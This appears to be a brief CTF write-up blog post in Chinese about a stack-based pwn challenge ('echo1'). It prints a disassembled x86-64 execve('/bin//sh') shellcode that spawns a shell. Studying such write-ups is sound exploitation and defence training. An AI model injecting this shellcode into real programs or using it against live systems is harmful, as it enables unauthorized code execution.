wtf

WTF is white tight feet.

开始时会让我们输入在栈上的name,限制长度,bss段的id会复制name。

1
2
3
4
5
6
7
8
9
10
 0:   50                      push   rax
1: 48 31 d2 xor rdx, rdx
4: 48 31 f6 xor rsi, rsi
7: 48 bb 2f 62 69 6e 2f movabs rbx, 0x68732f2f6e69622f
e: 2f 73 68
11: 53 push rbx
12: 54 push rsp
13: 5f pop rdi
14: b0 3b mov al, 0x3b
16: 0f 05 syscall

本文作者 : wtfff
本作品采用知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议(CC BY-NC-SA 4.0)进行许可。This blog is under a CC BY-NC-SA 4.0 Unported License
本文链接 : http://im0use.github.io/2022/05/18/echo1/

本文最后更新于 天前,文中所描述的信息可能已发生改变